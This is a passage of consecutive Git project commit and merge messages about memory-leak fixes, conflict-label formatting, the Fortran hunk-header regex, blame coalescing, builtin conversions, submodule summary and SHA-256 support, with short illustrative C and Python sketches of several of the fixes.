and to flush the buffer explicitly before closing the stream in order to
catch any write errors for these last bytes.
Helped-by: Chris Torek <chris.torek@gmail.com>
Helped-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Like f0bca72dc7 (send-pack: use buffered I/O to talk to pack-objects,
2016-06-08), significantly reduce the number of system calls and
simplify the code for sending object IDs to pack-objects by using
stdio's buffering.
Helped-by: Chris Torek <chris.torek@gmail.com>
Helped-by: Johannes Sixt <j6t@kdbg.org>
Encouraged-by: Derrick Stolee <stolee@gmail.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Like f0bca72dc7 (send-pack: use buffered I/O to talk to pack-objects,
2016-06-08), significantly reduce the number of system calls and
simplify the code for sending object IDs to rev-list by using stdio's
buffering.
Take care to handle errors immediately to get the correct error code,
and to flush the buffer explicitly before closing the stream in order to
catch any write errors for these last bytes.
Helped-by: Chris Torek <chris.torek@gmail.com>
Helped-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There are two functions to get a single config string:
- git_config_get_string()
- git_config_get_string_const()
One might naively think that the first one allocates a new string and
the second one just points us to the internal configset storage. But
in fact they both allocate a new copy; the second one exists only to
avoid having to cast when using it with a const global which we never
intend to free.
The documentation for the function explains that clearly, but it seems
I'm not alone in being surprised by this. Of 17 calls to the function,
13 of them leak the resulting value.
We could obviously fix these by adding the appropriate free(). But it
would be simpler still if we actually had a non-allocating way to get
the string. There's git_config_get_value() but that doesn't quite do
what we want. If the config key is present but is a boolean with no
value (e.g., "[foo]bar" in the file), then we'll get NULL (whereas the
string versions will print an error and die).
So let's introduce a new variant, git_config_get_string_tmp(), that
behaves as these callers expect. We need a new name because we have new
semantics but the same function signature (so even if we converted the
four remaining callers, topics in flight might be surprised). The "tmp"
is because this value should only be held onto for a short time. In
practice it's rare for us to clear and refresh the configset,
invalidating the pointer, but hopefully the "tmp" makes callers think
about the lifetime. In each of the converted cases here the value only
needs to last within the local function or its immediate caller.
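
The ownership difference between the two flavors can be sketched with a
toy key/value store. Everything here (the toy_ names, the table, the
0-on-found return convention) is an assumption for illustration and is
not the real config API.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

struct toy_config_entry {
	const char *key;
	const char *value;
};

/* Stand-in for the in-memory configset. */
static const struct toy_config_entry toy_config[] = {
	{ "gc.pruneexpire", "2.weeks.ago" },
	{ "core.worktree", "../work" },
};

/*
 * Non-allocating lookup: on success *dest points into the store.
 * The caller must not free it and should not hold on to it for long.
 * Returns 0 if the key was found, 1 otherwise.
 */
static int toy_get_string_tmp(const char *key, const char **dest)
{
	size_t i;

	assert(key && dest);
	for (i = 0; i < sizeof(toy_config) / sizeof(toy_config[0]); i++) {
		if (!strcmp(toy_config[i].key, key)) {
			*dest = toy_config[i].value;
			return 0;
		}
	}
	return 1;
}

/*
 * Allocating lookup: on success *dest is a fresh copy that the
 * caller owns and must free(). Forgetting to do so is the leak.
 */
static int toy_get_string(const char *key, char **dest)
{
	const char *tmp;
	size_t len;

	assert(dest);
	if (toy_get_string_tmp(key, &tmp))
		return 1;
	len = strlen(tmp) + 1;
	*dest = malloc(len);
	if (!*dest)
		abort();
	memcpy(*dest, tmp, len);
	return 0;
}
```

A caller that only parses or inspects the value can use the "tmp"
form and has nothing to clean up.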
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We unconditionally write a branch name into a newly allocated buffer in
new_branch_info->path, via setup_branch_path(). We then check to see if
the branch exists; if not, we set that field to NULL, leaking the
memory. We should take care to free() it when doing so.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The prepare_to_clone_next_submodule() function has a few local-variable
strbufs. We use strbuf_reset() throughout the function to reuse the
buffers over and over. But at the end of the function we also use
strbuf_reset() as they go out of scope, which means we end up leaking
their heap buffers. This should be strbuf_release() instead.
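
The distinction between the two calls is easy to see in a toy buffer
type. This is a simplified sketch with made-up names, not the strbuf
implementation.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

struct toy_buf {
	char *buf;
	size_t len, alloc;
};

/* Append s, growing the heap buffer as needed. */
static void toy_buf_addstr(struct toy_buf *sb, const char *s)
{
	size_t n;

	assert(sb && s);
	n = strlen(s);
	if (sb->len + n + 1 > sb->alloc) {
		size_t want = (sb->len + n + 1) * 2;
		char *grown = realloc(sb->buf, want);

		if (!grown)
			abort();
		sb->buf = grown;
		sb->alloc = want;
	}
	memcpy(sb->buf + sb->len, s, n + 1);
	sb->len += n;
}

/* Empty the contents but keep the heap buffer for reuse. */
static void toy_buf_reset(struct toy_buf *sb)
{
	assert(sb);
	sb->len = 0;
	if (sb->buf)
		sb->buf[0] = '\0';
}

/* Free the heap buffer; this is what must run before going out of scope. */
static void toy_buf_release(struct toy_buf *sb)
{
	assert(sb);
	free(sb->buf);
	sb->buf = NULL;
	sb->len = sb->alloc = 0;
}
```

Calling only the reset variant at the end of a function leaves the
allocation behind, which is the leak being fixed here.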
These were introduced by 48308681b0 (git submodule update: have a
dedicated helper for cloning, 2016-02-29), but it doesn't seem to have
the same mistake elsewhere. Likewise, I looked for other instances of
the pattern in the submodule--helper file but couldn't find any.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
sequencer's get_message() exists to provide good labels on conflict
hunks; see commits
d68565402a ("revert: clarify label on conflict hunks", 2010-03-20)
bf975d379d ("cherry-pick, revert: add a label for ancestor", 2010-03-20)
043a4492b3 ("sequencer: factor code out of revert builtin", 2012-01-11)
for background on this function. These labels are of the form
<commitID>... <commit summary>
or
parent of <commitID>... <commit summary>
These labels are then passed as branch names to the merge machinery.
However, these labels, as formatted, often also serve to confuse. For
example, if we have a rename involved in a content merge, then it
results in text such as the following:
<<<<<<<< HEAD:foo.c
int j;
========
int counter;
>>>>>>>> b01dface... Removed unnecessary stuff:bar.c
Or in various conflict messages, it can make it very difficult to read:
CONFLICT (rename/delete): foo.c deleted in b01dface... Removed
unnecessary stuff and renamed in HEAD. Version HEAD of foo.c left
in tree.
CONFLICT (file location): dir1/foo.c added in b01dface... Removed
unnecessary stuff inside a directory that was renamed in HEAD,
suggesting it should perhaps be moved to dir2/foo.c.
Make a minor change to remove the ellipses and add parentheses around
the commit summary; this makes all three examples much easier to read:
<<<<<<<< HEAD:foo.c
int j;
========
int counter;
>>>>>>>> b01dface (Removed unnecessary stuff):bar.c
CONFLICT (rename/delete): foo.c deleted in b01dface (Removed
unnecessary stuff) and renamed in HEAD. Version HEAD of foo.c left
in tree.
CONFLICT (file location): dir1/foo.c added in b01dface (Removed
unnecessary stuff) inside a directory that was renamed in HEAD,
suggesting it should perhaps be moved to dir2/foo.c.
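The two label shapes can be compared with a minimal Python sketch. The helper names old_label() and new_label() are hypothetical and are not the sequencer's code; they only mimic the formats described above, and the "parent of" variant is left out.

```python
def old_label(abbrev, subject):
    """Label shape before this change: '<commitID>... <commit summary>'."""
    return f"{abbrev}... {subject}"


def new_label(abbrev, subject):
    """Label shape after this change: '<commitID> (<commit summary>)'."""
    return f"{abbrev} ({subject})"


abbrev, subject = "b01dface", "Removed unnecessary stuff"

# The label is used like a branch name, so a path may be appended to it.
print(old_label(abbrev, subject) + ":bar.c")
print(new_label(abbrev, subject) + ":bar.c")
```

With the parentheses, the summary is visibly delimited from the path or sentence that follows it.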
Signed-off-by: Elijah Newren <newren@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Acked-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 96cc8ab531 (sparse-checkout: use hashmaps for cone patterns,
2019-11-21) added some auxiliary hashmaps to the pattern_list struct,
but they're leaked when clear_pattern_list() is called.
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There are still a handful of mentions of SHA-1 when we meant the
(hexadecimal) object names in end-user facing messages. Rewrite
them.
I was hoping that this can mostly be s/SHA-1/object name/, but
a few messages needed rephrasing to keep the result readable.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
One of the required steps for the objectFormat extension is to implement
the loose object index. However, without support for
compatObjectFormat, we don't even know if the loose object index is
needed, so it makes sense to move that step to the compatObjectFormat
section. Do so.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we have SHA-256 support for packs and indices, let's document
that in SHA-256 repositories, we use SHA-256 instead of SHA-1 for object
names and checksums. Instead of duplicating this information throughout
the document, let's just document that in SHA-1 repositories, we use
SHA-1 for these purposes, and in SHA-256 repositories, we use SHA-256.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "git blame --first-parent" option was not documented, but now
it is.
* rp/blame-first-parent-doc:
blame-options.txt: document --first-parent option
A new helper function has_object() has been introduced to make it
easier to mark object existence checks that do and don't want to
trigger lazy fetches, and a few such checks are converted using it.
* jt/has_object:
fsck: do not lazy fetch known non-promisor object
pack-objects: no fetch when allow-{any,promisor}
apply: do not lazy fetch when applying binary
sha1-file: introduce no-lazy-fetch has_object()
'todo_list_write_to_file' may overwrite the static buffer, originating
from 'find_unique_abbrev', that was used to store the short commit hash
'c' for "# Rebase a..b onto c" message in the todo editor. This is
because the buffer that is returned from 'find_unique_abbrev' is valid
until 4 more calls to `find_unique_abbrev` are made.
As 'todo_list_write_to_file' calls 'find_unique_abbrev' for each rebased
commit, the hash for 'c' is overwritten if there are 4 or more commits
in the rebase. This behavior has been broken since its introduction.
Fix by storing the short onto commit hash in a different buffer that
remains valid, before calling 'todo_list_write_to_file'.
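The failure mode can be modelled with a toy Python sketch. The AbbrevRing class is hypothetical; it assumes only what is stated above, namely that a returned buffer is reused once 4 more calls have been made, and it is not Git's implementation.

```python
class AbbrevRing:
    """Toy model of a function that hands out one of four rotating buffers."""

    SLOTS = 4  # a result stays valid until 4 more calls are made

    def __init__(self):
        self._bufs = [bytearray() for _ in range(self.SLOTS)]
        self._next = 0

    def abbrev(self, oid_hex, length=7):
        buf = self._bufs[self._next]
        self._next = (self._next + 1) % self.SLOTS
        buf[:] = oid_hex[:length].encode()  # overwrite the slot in place
        return buf  # the caller gets a reference to the slot, not a copy


ring = AbbrevRing()
onto = ring.abbrev("c0ffee1234")  # borrowed buffer holding the "onto" hash
onto_copy = bytes(onto)           # the fix: keep a private copy first

# One call per rebased commit, as when writing the todo list.
for oid in ("aaaaaaa111", "bbbbbbb222", "ccccccc333", "ddddddd444"):
    ring.abbrev(oid)

print(onto.decode())       # borrowed buffer after four more calls
print(onto_copy.decode())  # private copy
```

With three or fewer rebased commits the borrowed buffer would still be intact, which is why the problem only shows up with 4 or more commits.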
Found-by: Jussi Keränen <jussike@gmail.com>
Signed-off-by: Antti Keränen <detegr@rbx.email>
Acked-by: Alban Gruin <alban.gruin@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The third part of the Fortran xfuncname regex wants to match the
beginning of a subroutine or function, so it allows for all characters
except `'`, `"` or whitespace before the keyword 'function' or
'subroutine'. This is meant to match the 'recursive', 'elemental' or
'pure' keywords, as well as function return types, and to prevent
matches inside strings.
However, the negated set does not contain the `!` comment character,
so a line with an end-of-line comment containing the keyword 'function' or
'subroutine' followed by another word is mistakenly chosen as a hunk header.
Improve the regex by adding `!` to the negated set.
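The effect can be sketched with Python's re module. The two patterns below are simplified stand-ins written for this illustration (an assumption; the pattern in userdiff.c may differ in detail), and the sample lines are made up.

```python
import re

# Third part of the pattern, before and after adding '!' to the negated set.
OLD = re.compile(
    r"^[ \t]*([^'\" \t]+[ \t]+)*(subroutine|function)[ \t]+[a-z].*$",
    re.IGNORECASE)
NEW = re.compile(
    r"^[ \t]*([^!'\" \t]+[ \t]+)*(subroutine|function)[ \t]+[a-z].*$",
    re.IGNORECASE)

# Keyword inside an end-of-line comment, followed by another word.
comment_line = "x = y + 1 ! call function compute here"
# A genuine function definition with a leading 'pure' keyword.
real_line = "pure function area(r)"

print(bool(OLD.match(comment_line)), bool(NEW.match(comment_line)))
print(bool(OLD.match(real_line)), bool(NEW.match(real_line)))
```

Only the comment line changes behaviour: the old pattern accepts it as a hunk header and the new one rejects it, while the real definition matches both.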
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Fortran userdiff patterns, introduced in 909a5494f8 (userdiff.c: add
builtin fortran regex patterns, 2010-09-10), predate the test
infrastructure for xfuncname patterns, introduced in bfa7d01413 (t4018:
an infrastructure to test hunk headers, 2014-03-21).
Add tests for the Fortran xfuncname patterns. The test
't/t4018/fortran-comment-keyword' documents a shortcoming of the regex
that is fixed in a subsequent commit.
While at it, add descriptive comments for the different parts of the
regex.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The '--set-upstream' option to `git fetch` (which is also accepted by
`git pull` and passed through to the underlying `git fetch`) allows
setting the upstream configuration for the current branch. This was
added in 24bc1a1292 (pull, fetch: add --set-upstream option,
2019-08-19).
However, the documentation for that option describes its action as 'If
the remote is fetched successfully, pull and add upstream (tracking)
reference [...]', which is wrong because this option does not cause
neither `git fetch` nor `git pull` to pull: `git fetch` does not pull
and `git pull` always pulls.
Fix the description of that option.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the merge diagram, some whitespace is missing, which
makes it a bit confusing. Fix that.
Signed-off-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We UNLEAK() the "sorting" list created by parsing command-line options
(which is essentially used until the program exits). But we do so right
before leaving the cmd_ls_remote() function, which means we have to hit
all of the exits. But the point of UNLEAK() is that it's an annotation
which doesn't impact the variable itself. We can mark it as soon as
we're done writing its value, and then we only have to do so once.
This gives us a minor code reduction, and serves as a better example of
how UNLEAK() can be used.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The point of UNLEAK() is to make a reference to a variable that is about
to go out of scope so that leak-checkers will consider it to be
not-leaked. Doing so right before die() is therefore pointless; even
though we are about to exit the program, the variable will still be on
the stack and accessible to leak-checkers.
These annotations aren't really hurting anything, but they clutter the
code and set a bad example of how to use UNLEAK().
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The code in vcs-svn was started in 2010 as an attempt to build a
remote-helper for interacting with svn repositories (as opposed to
git-svn). However, we never got as far as shipping a mature remote
helper, and the last substantive commit was e99d012a6b in 2012.
We do have a git-remote-testsvn, and it is even installed as part of
"make install". But given the name, it seems unlikely to be used by
anybody (you'd have to explicitly "git clone testsvn::$url", and there
have been zero mentions of that on the mailing list since 2013, and even
that includes the phrase "you might need to hack a bit to get it working
properly"[1]).
We also ship contrib/svn-fe, which builds on the vcs-svn work. However,
it does not seem to build out of the box for me, as the link step misses
some required libraries for using libgit.a. Curiously, the original
build breakage bisects for me to eff80a9fd9 (Allow custom "comment
char", 2013-01-16), which seems unrelated. There was an attempt to fix
it in da011cb0e7 (contrib/svn-fe: fix Makefile, 2014-08-28), but on my
system that only switches the error message.
So it seems like the result is not really usable by anybody in practice.
It would be wonderful if somebody wanted to pick up the topic again, and
potentially it's worth carrying around for that reason. But the flip
side is that people doing tree-wide operations have to deal with this
code. And you can see the list with (replace "HEAD" with this commit as
appropriate):
{
echo "--"
git diff-tree --diff-filter=D -r --name-only HEAD^ HEAD
} |
git log --no-merges --oneline e99d012a6bc.. --stdin
which shows 58 times somebody had to deal with the code, generally due
to a compile or test failure, or a tree-wide style fix or API change.
Let's drop it and let anybody who wants to pick it up do so by
resurrecting it from the git history.
As a bonus, this also reduces the size of a stripped installation of Git
from 21MB to 19MB.
[1] https://lore.kernel.org/git/CALkWK0mPHzKfzFKKpZkfAus3YVC9NFYDbFnt+5JQYVKipk3bQQ@mail.gmail.com/
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no reason that git-fast-import benefits from being a separate
binary. And as it links against libgit.a, it has a non-trivial disk
footprint. Let's make it a builtin, which reduces the size of a stripped
installation from 22MB to 21MB.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no reason that bugreport has to be a separate binary. And since
it links against libgit.a, it has a rather large disk footprint. Let's
make it a builtin, which reduces the size of a stripped installation
from 24MB to 22MB.
This also simplifies our Makefile a bit. And we can take advantage of
builtin niceties like RUN_SETUP_GENTLY.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no real reason for credential helpers to be separate binaries. I
did them this way originally under the notion that helpers don't _need_
to be part of Git, and so can be built totally separately (and indeed,
the ones in contrib/credential are). But the ones in our main Makefile
build on libgit.a, and the resulting binaries are reasonably large.
We can slim down our total disk footprint by just making them builtins.
This reduces the size of:
make strip install
from 29MB to 24MB on my Debian system.
Note that credential-cache can't operate without support for Unix
sockets. Currently we just don't build it at all when NO_UNIX_SOCKETS is
set. We could continue that with conditionals in the Makefile and our
list of builtins. But instead, let's build a dummy implementation that
dies with an informative message. That has two advantages:
- it's simpler, because the conditional bits are all kept inside
the credential-cache source
- a user who is expecting it to exist will be told _why_ they can't
use it, rather than getting the "credential-cache is not a git
command" error which makes it look like the Git install is broken.
Note that our dummy implementation does still respond to "-h" in order
to appease t0012 (and this may be a little friendlier for users, as
well).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Over the years some more programs have become builtins, but nobody
updated this MSVC-specific section of the file (which specifically says
that it should not include builtins). Let's bring it up to date.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After blame has finished but before we produce any output, we coalesce
groups of lines that were adjacent in the original suspect (which may
have been split apart by lines in intermediate commits which went away).
However, this can cause incorrect output if the lines are not also
adjacent in the result. For instance, the case in t8003 has:
ABC
DEF
which becomes
ABC
SPLIT
DEF
Blaming only lines 1 and 3 in the result yields two blame groups (one
for each line) that were adjacent in the original. That's enough for us
to coalesce them into a single group, but that loses information: our
output routines assume they're adjacent in the result as well, and we
output:
<oid> 1) ABC
<oid> 2) SPLIT
This is nonsense for two reasons:
- we were asked about line 3, not line 2; we should not output the
SPLIT line at all
- commit <oid> did not touch the SPLIT line at all! We found the
correct blame for line 3, but the bug is actually in the output
stage, which is showing the wrong line number and content from the
final file.
We can fix this by only coalescing when both the suspect and result
lines are adjacent. That fixes this bug, but keeps coalescing in cases
where we want it (e.g., the existing test in t8003 where SPLIT goes away,
and the lines really are adjacent in the result).
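The tightened condition can be sketched in Python. This is a simplified model under stated assumptions, not the code in blame.c: the BlameEntry class and its field names are illustrative, and line numbers are 0-based.

```python
from dataclasses import dataclass


@dataclass
class BlameEntry:
    commit: str     # commit blamed for these lines
    lno: int        # first line in the result
    s_lno: int      # first line in the suspect
    num_lines: int  # number of lines in the group


def coalesce(entries):
    """Join neighbouring groups only if adjacent in suspect AND result."""
    out = []
    for ent in entries:
        prev = out[-1] if out else None
        if (prev is not None
                and prev.commit == ent.commit
                and prev.s_lno + prev.num_lines == ent.s_lno
                and prev.lno + prev.num_lines == ent.lno):  # the added check
            prev.num_lines += ent.num_lines
        else:
            out.append(BlameEntry(ent.commit, ent.lno, ent.s_lno, ent.num_lines))
    return out


# ABC and DEF are adjacent in the suspect but separated by SPLIT in the result.
split_case = coalesce([BlameEntry("orig", 0, 0, 1), BlameEntry("orig", 2, 1, 1)])
# Here the two lines are adjacent on both sides.
joined_case = coalesce([BlameEntry("orig", 0, 0, 1), BlameEntry("orig", 1, 1, 1)])

print(len(split_case), len(joined_case))
```

Without the check on lno, the first case would collapse into one two-line group starting at result line 0, which is how the SPLIT line ended up in the output.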
Reported-by: Nuthan Munaiah <nm6061@rit.edu>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for adding more tests of blame's coalesce code, let's
split the setup out from the first test, and give each of the commits
a more meaningful name:
- $orig for the original source that added the lines
- $split for the version where they are split apart
- $final for the final version that re-joins them
That's not strictly necessary, but makes the follow-on tests less
brittle than relying on HEAD^, etc, to name the commits.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit f0cbe742f4 (blame: add a test to cover blame_coalesce(),
2019-06-20) added a test case where blame can usefully coalesce two
groups of lines. But since it relies on the normal blame output, it only
exercises the code and can't tell whether the lines were actually
joined into a single group.
However, by using --porcelain output, we can see how git-blame considers
the groupings (and likewise how the coalescing might have a real
user-visible impact for a tool that uses the porcelain-output
groupings). This lets us confirm that we are indeed coalescing correctly
(and the fact that this test case requires coalescing can be verified by
dropping the call to blame_coalesce(), causing the test to fail).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Convert submodule subcommand 'summary' to a builtin and call it via
'git-submodule.sh'.
The shell version had to call $diff_cmd twice, once to find the modified
modules cared about by the user and then again, with that list of modules
to do various operations for computing the summary of those modules.
On the other hand, the C version does not need a second call to
$diff_cmd since it reuses the module list from the first call to do the
aforementioned tasks.
In the C version, we use the combination of setting a child process'
working directory to the submodule path and then calling
'prepare_submodule_repo_env()' which also sets the 'GIT_DIR' to '.git',
so that we can be certain that those spawned processes will not access
the superproject's ODB by mistake.
A behavioural difference between the C and the shell version is that the
shell version outputs two line feeds after the 'git log' output when run
outside of the tests while the C version outputs one line feed in any
case. The reason for this is that the shell version calls log with
'--pretty=format:<fmt>' whose output is followed by two echo
calls; 'format' does not have "terminator" semantics like its 'tformat'
counterpart. So, the log output is terminated by a newline only when
invoked by the user and not when invoked from the scripts. This results
in the one & two line feed differences in the shell version.
On the other hand, the C version calls log with '--pretty=<fmt>'
which is equivalent to '--pretty=tformat:<fmt>' which is then
followed by a 'printf("\n")'. Due to its "terminator" semantics the
log output is always terminated by newline and hence one line feed in
any case.
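The difference between the two semantics can be shown with a minimal Python sketch. The functions render_format() and render_tformat() are hypothetical names for this illustration and only model where the newline is placed between records; they do not reproduce any other behaviour of 'git log'.

```python
def render_format(records):
    """'format:' style: the newline separates records."""
    return "\n".join(records)


def render_tformat(records):
    """'tformat:' style: the newline terminates every record."""
    return "".join(record + "\n" for record in records)


commits = ["> first change", "> second change"]

print(repr(render_format(commits)))
print(repr(render_tformat(commits)))
```

The separator form leaves the last record without a trailing newline, whereas the terminator form always ends with one.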
Also, when we try to pass an option-like argument after a non-option
argument, for instance:
git submodule summary HEAD --foo-bar
(or)
git submodule summary HEAD --cached
That argument would be treated like a path to the submodule for which
the user is requesting a summary. So, the option ends up having no
effect. Though, passing '--quiet' is an exception to this:
git submodule summary HEAD --quiet
While 'summary' doesn't support '--quiet', we don't get an output for
the above command as '--quiet' is treated as a path which means we get
an output only if a submodule whose path is '--quiet' exists.
The error message in case of computing a summary for non-existent
submodules in the C version is different from that of the shell version.
Since the new error message is not marked for translation, change the
'test_i18ngrep' in t7421.4 to 'grep'.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Stefan Beller <stefanbeller@gmail.com>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Helped-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Prathamesh Chavan <pc44800@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
't7401-submodule-summary.sh' uses 'git add' to add submodules. Therefore,
some commands such as 'git submodule init' and 'git submodule deinit'
do not work as expected.
So, introduce a test script for verifying the 'summary' output for
submodules added using 'git submodule add' and notify regarding the
above mentioned behaviour in t7401 itself.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The helper functions: show_submodule_summary(),
prepare_submodule_summary() and print_submodule_summary() are used by
the builtin_diff() function in diff.c to generate a summary of
submodules in the context of a diff. Functions with similar names are to
be introduced in the upcoming port of submodule's summary subcommand.
So, rename the helper functions to '*_diff_submodule_summary()' to avoid
ambiguity.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Many `submodule--helper` subcommands follow the convention that a struct
defines their callback data, and the declaration of that struct is
followed immediately by a macro to use in static initializers, without
any separating empty line.
Let's align the `init`, `status` and `sync` subcommands with that convention.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Helped-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Helped-by: Philip Oakley <philipoakley@iee.email>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Nonbare repositories are special directories. Unlike normal directories
that we might recurse into to list the files they contain, nonbare
repositories must themselves match and then we always report only on the
nonbare repository directory itself and not on any of its contents.
Separately, when traversing directories to try to find untracked or
excluded files, we often think in terms of paths either matching the
specified pathspec, or not matching them. However, there is a special
value that do_match_pathspec() uses named
MATCHED_RECURSIVELY_LEADING_PATHSPEC which means "this directory does
not match any pathspec BUT it is possible a file or directory underneath
it does." That special value prevents us from prematurely thinking that
some directory and everything under it is irrelevant, but also allows us
to differentiate from "this is a match".
The combination of these two special cases was previously uncovered.
Add a test to the testsuite to cover it, and make sure that we return a
nonbare repository as a non-match if the best match it got was
MATCHED_RECURSIVELY_LEADING_PATHSPEC.
Reported-by: christian w <usebees@gmail.com>
Simplified-testcase-and-bisection-by: Kyle Meyer <kyle@kyleam.com>
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is no such flag as --o; it is either --others or -o.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The only caller of reschedule_last_action was removed by ef64bb328d
(rebase: strip unused code in git-rebase--preserve-merges.sh,
2018-05-28); remove this unused shell function as well.
Signed-off-by: René Scharfe <l.s.r@web.de>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
CMake support to build with MSVC for Windows bypassing the Makefile.
* ss/cmake-build:
ci: modification of main.yml to use cmake for vs-build job
cmake: support for building git on windows with msvc and clang.
cmake: support for building git on windows with mingw
cmake: support for testing git when building out of the source tree
cmake: support for testing git with ctest
cmake: installation support for git
cmake: generate the shell/perl/python scripts and templates, translations
Introduce CMake support for configuring Git
The component to respond to "git fetch" request is made more
configurable to selectively allow or reject object filtering
specification used for partial cloning.
* tb/upload-pack-filters:
t5616: use test_i18ngrep for upload-pack errors
upload-pack.c: introduce 'uploadpackfilter.tree.maxDepth'
upload-pack.c: allow banning certain object filter(s)
list_objects_filter_options: introduce 'list_object_filter_config_name'
Doc cleanup around "worktree".
* es/worktree-doc-cleanups:
git-worktree.txt: link to man pages when citing other Git commands
git-worktree.txt: make start of new sentence more obvious
git-worktree.txt: fix minor grammatical issues
git-worktree.txt: consistently use term "working tree"
git-worktree.txt: employ fixed-width typeface consistently
The final leg of SHA-256 transition.
* bc/sha-256-part-3: (39 commits)
t: remove test_oid_init in tests
docs: add documentation for extensions.objectFormat
ci: run tests with SHA-256
t: make SHA1 prerequisite depend on default hash
t: allow testing different hash algorithms via environment
t: add test_oid option to select hash algorithm
repository: enable SHA-256 support by default
setup: add support for reading extensions.objectformat
bundle: add new version for use with SHA-256
builtin/verify-pack: implement an --object-format option
http-fetch: set up git directory before parsing pack hashes
t0410: mark test with SHA1 prerequisite
t5308: make test work with SHA-256
t9700: make hash size independent
t9500: ensure that algorithm info is preserved in config
t9350: make hash size independent
t9301: make hash size independent
t9300: use $ZERO_OID instead of hard-coded object ID
t9300: abstract away SHA-1-specific constants
t8011: make hash size independent
...
--diff-merges=off is the only accepted form for now, a synonym for
--no-diff-merges.
This patch is a preparation for adding more values, as well as supporting
--diff-merges=<parent>, where <parent> is a single parent number to output
the diff against.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The test added by e5256c82e5 (refs: fix interleaving hook calls with
reference-transaction hook, 2020-08-07) uses hard-coded sha1 object ids
in its expected output. This causes it to fail when run with
GIT_TEST_DEFAULT_HASH=sha256.
Let's make use of the oid variables we define earlier, as the rest of
the nearby tests do.
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --batch-size=<size> option of 'git multi-pack-index repack' is
intended to limit the amount of work done by the repack. In the case of
a large repository, this command should repack a number of small
pack-files but leave the large pack-files alone. Most often, the
repository has one large pack-file from a 'git clone' operation and
a number of smaller pack-files from incremental 'git fetch' operations.
The issue with '--batch-size' is that it also _prevents_ the repack from
happening if the expected size of the resulting pack-file is too small.
This was intended as a way to avoid frequent churn of small pack-files,
but it has mostly caused confusion when a repository is of "medium"
size. That is, not enormous like the Windows OS repository, but also not
so small that this incremental repack isn't valuable.
The solution presented here is to collect pack-files for repack if their
expected size is smaller than the batch-size parameter until either the
